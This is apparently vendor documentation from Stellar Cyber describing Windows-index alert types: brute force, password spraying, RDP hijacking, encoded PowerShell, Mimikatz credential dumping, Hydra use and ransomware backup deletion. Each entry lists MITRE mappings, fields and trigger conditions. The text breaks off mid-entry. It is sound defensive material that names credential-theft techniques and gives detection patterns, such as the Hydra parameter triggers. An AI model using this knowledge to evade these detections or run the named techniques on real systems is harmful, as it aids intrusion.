Alert Types That Use the Windows Index
The Alert Types listed below use the Windows Index . For a list of Alert Types by each index or XDR Kill Chain stage, or for a general overview, refer to Machine Learning and Analytics Overview.
To minimize excessive alerting, each alert type is triggered only once in a 24-hour period for the set of attributes that triggered that specific alert.
Where applicable, the Tactics and Techniques are linked to the relevant MITRE | ATT&CK page.
Stellar Cyber also provides an interactive tool that lets you look up alert types by data source, alert name, event type, or source index.
- Abnormal Parent / Child Process
- Azure AD Apps Modified To Allow Multi-Tenant Access
- Azure AD Custom Domains Changed
- Backup Catalogs Deleted by Ransomware
- Bad Reputation Login
- Command Anomaly
- Encoded PowerShell
- External Account Login Failure Anomaly
- External Brute-Forced Successful User Login
- External Credential Stuffing
- External Password Spraying
- External RDP BlueKeep
- External RDP Suspicious Outbound
- External User Login Failure Anomaly
- Hydra Password Guessing Hack Tool
- Impossible Travel Anomaly
- Internal Account Login Failure Anomaly
- Internal Brute-Forced Successful User Login
- Internal Credential Stuffing
- Internal Password Spraying
- Internal RDP BlueKeep
- Internal RDP Suspicious Outbound
- Internal User Login Failure Anomaly
- Login Time Anomaly
- Malware on Disk
- Mimikatz Credential Dump
- Mimikatz DCSync
- Office 365 Access Governance Anomaly
- Office 365 Admin Audit Logging Disabled
- Office 365 Blocked User
- Office 365 Content Filter Policy Changed
- Office 365 Data Exfiltration Attempt Anomaly
- Office 365 Data Loss Prevention
- Office 365 File Sharing with Outside Entities
- Office 365 Malware Filter Policy Changed
- Office 365 Multiple Files Restored
- Office 365 Multiple Users Deleted
- Office 365 Network Security Configuration Changed
- Office 365 Password Policy Changed
- Office 365 Sharing Policy Changed
- Office 365 User Network Admin Changed
- Password Cracking with Hashcat
- Password Spraying Attempts with DSACLS
- Potentially Malicious Windows Event
- PowerShell Remote Access
- Process Anomaly
- RDP Port Opening
- RDP Registry Modification
- RDP Reverse Tunnel
- RDP Session Hijacking
- RDP Settings Hijacking
- RDP Suspicious Logon
- RDP Suspicious Logon Attempt
- Sensitive Windows Active Directory Attribute Modification
- Sensitive Windows Network Share File or Folder Accessed
- SMB Impacket Lateralization
- SMB Specific Service Installation
- SMB Suspicious Copy
- Suspicious Access Attempt to Windows Object
- Suspicious Activity Related to Security-Enabled Group
- Suspicious Connection to Another Process
- Suspicious Handle Request to Sensitive Object
- Suspicious Powershell Script
- Suspicious Process Creation Commandline
- Suspicious Windows Active Directory Operation
- Suspicious Windows Logon Event
- Suspicious Windows Process Creation
- Suspicious Windows Service Installation
- Uncommon Process Anomaly
- User Asset Access Anomaly
- User Login Location Anomaly
- User Process Usage Anomaly
- Volume Shadow Copy Deletion via VssAdmin
- Volume Shadow Copy Deletion via WMIC
Abnormal Parent / Child Process
A process that typically launches a small, consistent number of child processes launched a new child process. Investigate the child process to see if it is benign.
This alert type has two subtype categories:
Alert Subtype: Machine Learning Anomaly Detection
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: XDR EBA (XTA0001)
-
Technique: XDR Process Relationship Anomaly (XT1002)
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is parent_child
.
Key Fields and Relevant Data Points
parent_proc_name
— name of the parent processsrcip_host
— host name of corresponding source IP addressprocess_name
— name of the processstability
— score measuring the time since the parent process launched the last child processdiversity
— score measuring the number of child processes that the parent process spawneddays_stable
— time since the parent process launched the last child processchild_count
— number of child processes that the parent process spawned
Use Case with Data Points
Each pair of parent/child processes (parent_proc_name
and process_name
) is examined periodically. If a parent process (parent_proc_name
) with a small number of child processes (diversity
, child_count
) has not launched a new child process (process_name
) for a long time (stability
, days_stable
) launches a new child process from a host (srcip_host
), an alert is triggered.
Alert Subtype: Rule Based Detection
The Parent/Child Suspicious Process Creation rules are used to identify suspicious activity with parent/child relationships associated with process creation. Any one or more of these will trigger the Parent/Child Suspicious Process Creation alert types.
Key Fields and Relevant Data Points
hostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Parent/Child Suspicious Process Creation Alert Type
Azure AD Apps Modified To Allow Multi-Tenant Access
Azure AD detected an application being modified to allow multi-tenant access. Check with the organization to be sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Persistence (TA0003 )
-
Technique: Account Manipulation (T1098 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is azure_ad_add_app_multitenant
.
Key Fields and Relevant Data Points
srcip_usersid
— user ID that modified the property changeactivityDisplayName
— description of the actiontargetResources.modifiedProperties.displayName
— properties that were changed
Use Case with Data Points
If Azure AD detects any user (srcip_usersid
) changing an application to allow multi-tenant access, an alert is triggered. A sample Interflow includes the user ID (srcip_usersid
), activity name (activityDisplayName
), and name of the changed property (targetResources.modifiedProperties.displayName
).
Azure AD Custom Domains Changed
Azure AD detected a custom domain being changed. Check with the organization to be sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Domain Policy Modification (T1484 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is azure_ad_change_domain
.
Key Fields and Relevant Data Points
srcip_usersid
— user account that made the domain changeactivityDisplayName
— activity display nameactivity_name
— action description
Use Case with Data Points
If Azure AD detects any user (srcip_usersid
) changing a custom domain, an alert is triggered. A sample Interflow includes the user ID (srcip_usersid
) and activity name (activity_name
).
Backup Catalogs Deleted by Ransomware
The wbadmin.exe
utility was used to delete the backup catalog. Ransomware and other malware do this to prevent system recovery. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Indicator Removal on Host (T1070 )
-
Tags: [Malware; Ransomware]
Event Name
The xdr_event.name
for this alert type in the Interflow data is ransomware_delete_backup_catalogs
.
Key Fields and Relevant Data Points
hostip
— IP address of the host executing the processprocess_name
— name of the processevent_data.CommandLine
— command that was executed
Use Case with Data Points
If wbadmin.exe
is used to delete the backup catalog, an alert is triggered. The Interflow includes the host IP address (hostip
), process name (process_name
), and command line (event_data.CommandLine
).
Bad Reputation Login
A successful login was detected from an IP address with a history of malicious activity. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] XDR NBA (XTA0002)
-
Technique: XDR Bad Reputation (XT2010)
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is bad_reputation_login
.
Key Fields and Relevant Data Points
srcip
— source IP addresssrcip_host
— source host namesrcip_reputation
— source reputationsource_geo.countryName
— source countrydstip_host
— destination host namelogin_type
— type of loginusername
— user name
Use Case with Data Points
The login records are checked for every source IP address (srcip
). If a source IP address has successful login records and its reputation (srcip_reputation
) is bad (except brute-forcer and scanner), an alert is triggered. A sample Interflow includes source IP address (srcip
), source host (srcip_host
), source reputation (srcip_reputation
), source country (srcip_geo.countryName
), login type (login_type
), and user name (username
).
Command Anomaly
A command has been executed an anomalously large number of times compared to its typical executions or those of other commands. Investigate the command and the user to determine if this is expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Execution (TA0002 )
-
Technique: Command and Scripting Interpreter (T1059 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is command_anomaly
.
Key Fields and Relevant Data Points
command
— command executedactual
— actual number of executions in the periodtypical
— typical number of executions in the periodcwd
— current working directory from which the command executedhostip
— host running the agent sensorsrcip
— source IP address from which the command was runusername
— user name who ran the command
Use Case with Data Points
The number of times a command (command
) has been executed is calculated periodically. If the volume (actual
) is much larger than the typical volume (typical
) of the command or other commands in any period, an alert is triggered. The Interflow includes the directory from which the command was executed (cwd
), the host and source IP addresses (hostip
and srcip
) from which the command was executed, and the name of the user who ran the command (username
).
Encoded PowerShell
A Windows host executed an encoded PowerShell script. Investigate the script contents to see if it is malicious. If so, consider quarantining the host.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Execution (TA0002 )
-
Technique: Command and Scripting Interpreter (T1059 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is encoded_powershell
.
Key Fields and Relevant Data Points
srcip
— source IP addressevent_data.ContextInfo
— PowerShell script contextevent_data.Payload
— PowerShell script payload
Use Case with Data Points
If a Windows host (srcip
) executes a PowerShell script whose context (event_data.ContextInfo
) includes flags that indicate encoding or obfuscation of the script, an alert is triggered. The Interflow includes the IP address of the Windows host (srcip
), the script context (event_data.ContextInfo
), and script payload (event_data.Payload
).
External Account Login Failure Anomaly
An anomalously large number of user login failures was observed for an account. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_cloud_account_login_failure
.
Key Fields and Relevant Data Points
srcip_usersid
— cloud account user IDscrip_username
— cloud account user nameevent_summary.total_failed
— number of failed logins in the periodevent_summary.total_successful
— number of successful logins in the periodevent_summary.total_fail_ratio
— percent of failed logins in the period, which is:event_summary.total_failed
/ (event_summary.total_failed
+event_summary.total_successful
)accumulated_anomalous_failures
— score value of the model indicating the degree of abnormal activitysrcip_host
— host name of corresponding source IP addresslogin_type
— type of loginsrcip_reputation
— source reputation
Use Case with Data Points
Login failures and successes are calculated periodically for every account (srcip_usersid
). If the number of failures is significantly larger than the number of successes, an alert is triggered. A sample Interflow includes the login type (login_type
), source host (srcip_host
), and source reputation (srcip_reputation
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
External Brute-Forced Successful User Login
A successful login was observed from an IP address that had previously seen a large number of login failures, or a successful login to a user account was observed from another IP address or IP addresses that had previously seen a large number of login failures to that account. Check with the user.
This alert type has two subtypes:
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_user_success_brute_forcer
.
Alert Subtype: Source IP-Based
The source IP-based alert subtype has the same XDR Kill Chain and Event Name as the user ID-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
srcip
— source IP addresssrcip_usersid
— Windows SID associated with the source IP addresssrcip_host
— source host namesrcip_reputation
— source reputationsource_geo.countryName
— source countrydstip_host
— destination host namelogin_type
— type of loginusername
— user namerelated_alert._id
— link to the related External User Login Failure Anomaly
Use Case with Data Points
The login records are checked for every external source IP address (srcip
). An alert is triggered if that IP address:
- Has so many failed login attempts that it triggered the External User Login Failure Anomaly, and
- Had a successful login
A sample Interflow includes the source IP address (srcip
), login type (login_type
), source host (srcip_host
), source reputation (srcip_reputation
), source country (srcip_geo.countryName
), and user name (username
).
The user ID-based alert subtype has the same XDR Kill Chain and Event Name as the source IP-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
srcip_usersid
— Windows SID associated with the source IP addresssrcip
— source IP addresssrcip_host
— source host namesrcip_reputation
— source reputationsource_geo.countryName
— source countrydstip_host
— destination host namelogin_type
— type of loginusername
— user namerelated_alert._id
— link to the related External Account Login Failure Anomaly
Use Case with Data Points
The login records to a user account (srcip_usersid
) are checked for every external source IP address (srcip
). An alert is triggered if that user account:
-
Has so many failed login attempts that it triggered the External Account Login Failure Anomaly, and
-
Had a successful login
A sample Interflow includes the source IP address (srcip
), login type (login_type
), source host (srcip_host
), source reputation (srcip_reputation
), source country (srcip_geo.countryName
), and user name (username
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
External Credential Stuffing
An anomalously large amount of username/password testing was detected on AWS, Okta, or Windows. Check the activity after successful logins, and consider blocking the source IP addresses.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_credential_stuffing
.
Key Fields and Relevant Data Points
msg_class
— name of the service:cloudtrail
for AWS,okta
for Okta,Microsoft-Windows-Security-Auditing
for Windowsservice_id
— specific account ID of a servicelogin_failure_rate
— rate of login failures per minute in the periodunknown_users_rate
— rate of unknown user names per minute in the periodunknown_users_to_login_failures
— ratio of unknown user names to login failures in the periodsuspicious_ips
— suspicious source IP addresses (up to 100)possible_breached_ips
— list of malicious IPs that may have successful breach activities
Use Case with Data Points
External credential stuffing is the constant testing of username/password combinations on the AWS, Okta, or Windows authentication functions. Login activity is monitored and if the number of failed logins is larger than normal for that service, an alert is triggered. The Interflow includes the service (msg_class
), tenant's account ID on that service (service_id
), suspicious source IP address (suspicious_ips
), login failure rate (login_failure_rate
), unknown user rate (unknown_users_rate
), the ratio of unknown users to login failures (unknown_users_to_login_failures
), and a list of source IP addresses that might have suspicious activities and should be investigated (possible_breached_ips
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
External Password Spraying
.An anomalously large number of failed logins with unknown user names was observed on external Windows authentication services. Check the activity after successful logins, and consider blocking the source IP addresses.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Sub-technique: Password Spraying (T1110.003 )
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_password_spray
.
Key Fields and Relevant Data Points
srcip
— source IP address generating a failed loginor
event_data.Workstation
— workstation causing the alertThe key field for this alert type can be either
srcip
orevent_data.Workstation
, depending on the data feed.event_id
— Windows event ID corresponding to the login failurelogin_type
— type of login; the available values vary byevent_id
actual
— actual number of failed logins with unknown user names in a 5-minute periodtypical
— typical number of failed logins with unknown user names in a 5-minute periodpassword_spray_user_summary
— list of up to 100 unknown user names associated with the failed logins (the first three are shown in the alert description)
Use Case with Data Points
If a potential password spraying attack is observed, an alert is triggered. The Interflow includes a source (srcip
or event_data.Workstation
), timestamp, the type of login (login_type
), the number of failed logins (actual
), the usual number of failed logins (typical
), and a sampling of the user names used in the attack (password_spray_user_summary
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
External RDP BlueKeep
Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to BlueKeep (CVE-2019-0708). Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [External] Privilege Escalation (TA0004 )
-
Technique: Exploitation for Privilege Escalation (T1068 )
-
Tags: [External; RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_rdp_bluekeep
.
Key Fields and Relevant Data Points
ids.signature
— IDS signaturesrcip_host
— source host namedstip_host
— destination host name
Use Case with Data Points
If the scanner by zerosum0x0 is used, an alert is triggered. A sample Interflow includes the IDS signature (ids.signature
), source host (srcip_host
), and destination host (dstip_host
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
External RDP Suspicious Outbound
Non-standard tools connecting to TCP port 3389 were detected. This could indicate lateral movement attempting to establish an RDP connection. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] XDR NBA (XTA0002)
-
Technique: XDR App Anomaly (XT2003)
-
Tags: [External; RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_rdp_suspicious_outbound
.
Key Fields and Relevant Data Points
srcip
— source IP address of the host that connects to TCP port 3389 with a non-standard toolsrcip_host
— source host nameprocess_name
— process name
Use Case with Data Points
Connections to TCP port 3389 are monitored, and if non-standard tools connect, an alert is triggered. A sample Interflow includes the source IP address (srcip
) and the process name (process_name
). The following are the standard tools:
- mstsc.exe
- RTSApp.exe
- RTS2App.exe
- RDCMan.exe
- ws_TunnelService.exe
- RSSensor.exe
- RemoteDesktopManagerFree.exe
- RemoteDesktopManager.exe
- RemoteDesktopManager64.exe
- mRemoteNG.exe
- mRemote.exe
- Terminals.exe
- spiceworks-finder.exe
- FSDiscovery.exe
- FSAssessment.exe
- MobaRTE.exe
- chrome.exe
- thor.exe
- thor64.exe
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
External User Login Failure Anomaly
An anomalous number of login failures was observed for one of the following applications: SSH, SMTP, FTP, RDP, SMB, databases, Active Directory, Office 365, Okta, AWS CloudTrail, or Google Workspace. For Okta, an anomalous number of multi-factor authentication (MFA) failures was observed. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is external_user_login_fail
.
Key Fields and Relevant Data Points
srcip
— source IP addressdstip
— destination IP addressdstip_host
— destination host nameevent_summary.total_failed
— number of failed logins in the periodevent_summary.total_successful
— number of successful logins in the periodevent_summary.total_fail_ratio
— percent of failed logins in the period, which is:event_summary.total_failed
/ (event_summary.total_failed
+event_summary.total_successful
)accumulated_anomalous_failures
— score value of the model indicating the degree of abnormal activitylogin_type
— type of login, such asssh_traffic
,okta_log
, oraws_cloudtrail
srcip_host
— source host namesrcip_reputation
— source reputation
Use Case with Data Points
Login failures and successes are calculated periodically for every source (srcip
) and destination (dstip
) IP address. If the number of failures is significantly larger than the number of successes, an alert is triggered. The Interflow includes the login type (login_type
), source host (srcip_host
), and source reputation (srcip_reputation
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Hydra Password Guessing Hack Tool
A user on a Windows host executed a command-line script that launched either the hydra.exe command or a command using known Hydra style parameters, which may be an inappropriate use of the Hydra password guessing tool.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Hydra]
Event Name
The xdr_event.name
for this alert type in the Interflow data is hydra_password_guessing_hack_tool
.
Key Fields and Relevant Data Points
hostip
— device internal IP addressevent_data.Image
— process running hydra.exe for password cracking.event_data.CommandLine
— command used to run the toolcomputer_name
— name of the Windows host
Use Case with Data Points
This alert is triggered if a Windows host (hostip
) executes a PowerShell script with a context that includes one or more flags (event_data.Image
or event_data.CommandLine
indicating usage of the Hydra password guessing hack tool. The Interflow includes the IP address of the Windows host (hostip
), the host name (computer_name
), and the script image (event_data.Image
) or script payload (event_data.CommandLine
).
Validation / Remediation
Check the body of the Powershell script that is reported on the Windows host to identify whether the contents of the script are actually malicious. If malicious, consider quarantining the host.
Potential False Positives
The running of any executable named hydra.exe
or a command that has parameters of -u
and -p
or ^user^
and ^pass^
triggers this alert.
Impossible Travel Anomaly
A user logged in from locations that are geographically impossible to travel between in the time frame. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] XDR UBA (XTA0004)
-
Technique: XDR Location Anomaly (XT2001)
-
Tags: [User Behavior Analytics]
Event Name
The xdr_event.name
for this alert type in the Interflow data is user_impossible_travel
.
Key Fields and Relevant Data Points
srcip_usersid
— source user IDsrcip_username
— source user namesrcip
— source IP addresssrcip_geo
— source IP address geo location, including latitude and longitudedistance_deviation
— deviation in distance (miles) between the two login locationstime_deviation
— deviation in time (seconds) between the two login eventstravel_speed
— calculated speed for the user to travel between the two location (miles/hour)appid_name
— application name for the login eventlast_login_time
— time of 2nd login, event 2 (E2)_id2
— ID of E2_index2
— index of E2srcip2
— source IP address of E2srcip_geo2
— source IP address geo location of E2, including latitude and longitudeengid_gateway
— gateway IP address, used to determine geo location when source IP address is private
Use Case with Data Points
Login events (E1 and E2) are examined for a user (srcip_usersid
), to see if the login locations (srcip_geo
and srcip_geo2
), that are at least 100 miles apart, changed faster (travel_speed
= distance_deviation
/time_deviation
) than possible with the typical commercial flight speed of 600 miles/hour.
E1 is the basis for the Interflow. The srcip_usersid
and srcip_username
identify the user, appid_name
identifies the application, and last_login_time
identifies the time when the 2nd login event happened. You can find detailed information about E2 by checking id2
in index2
, source IP (srcip2
), and geo location (srcip_geo2
).
Internal Account Login Failure Anomaly
An anomalously large number of login failures from an internal source IP address to an internal destination IP address was observed for an account. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Internal]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_cloud_account_login_failure
.
Key Fields and Relevant Data Points
srcip_usersid
— account user IDor
-
srcip_username
— account user name, enriched fromevent_data.targetusername
The key field for this alert type can be either
srcip_usersid
orsrcip_username
, depending on the data feed. event_summary.total_failed
— number of failed logins in the periodevent_summary.total_successful
— number of successful logins in the periodevent_summary.total_fail_ratio
— percent of failed logins in the period, which is:event_summary.total_failed
/ (event_summary.total_failed
+event_summary.total_successful
)accumulated_anomalous_failures
— score value of the model indicating the degree of abnormal activitysrcip_host
— host name of corresponding source IP addresslogin_type
— type of loginsrcip_reputation
— source reputation
Use Case with Data Points
Login failures and successes between any internal IP addresses are calculated periodically for every account (srcip_usersid
). If the number of failures is significantly larger than the number of successes, an alert is triggered. A sample Interflow includes the login type (login_type
), source host (srcip_host
), and source reputation (srcip_reputation
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Internal Brute-Forced Successful User Login
A successful login was observed from an IP address that had previously seen a large number of login failures, or a successful login to a user account was observed from another IP address or IP addresses that had previously seen a large number of login failures to that account. Check with the user.
This alert type has two subtypes:
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Internal]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_user_success_brute_forcer
.
Alert Subtype: Source IP-Based
The source IP-based alert subtype has the same XDR Kill Chain and Event Name as the user ID-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
srcip
— source IP addresssrcip_usersid
— Windows SID associated with the source IP addresssrcip_host
— source host namesrcip_reputation
— source reputationsource_geo.countryName
— source countrydstip_host
— destination host namelogin_type
— type of loginusername
— user namerelated_alert._id
— link to the related Internal User Login Failure Anomaly
Use Case with Data Points
The login records to an internal IP address (dstip
) are checked for every internal source IP address (srcip
). An alert is triggered if that IP address:
-
Has so many failed login attempts that it triggered the Internal User Login Failure Anomaly, and
-
Had a successful login
A sample Interflow includes the source IP address (srcip
), login type (login_type
), source host name (srcip_host
), source reputation (srcip_reputation
), source country (srcip_geo.countryName
), and user name (username
).
The user ID-based alert subtype has the same XDR Kill Chain and Event Name as the source IP-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
srcip
— source IP addresssrcip_usersid
— Windows SID associated with the source IP addresssrcip_host
— source host namesrcip_reputation
— source reputationsource_geo.countryName
— source countrydstip_host
— destination host namelogin_type
— type of loginusername
— user namerelated_alert._id
— link to the related Internal Account Login Failure Anomaly
Use Case with Data Points
The login records to a user account (srcip_usersid
) are checked for every internal source IP address (srcip
). An alert is triggered if that user account:
-
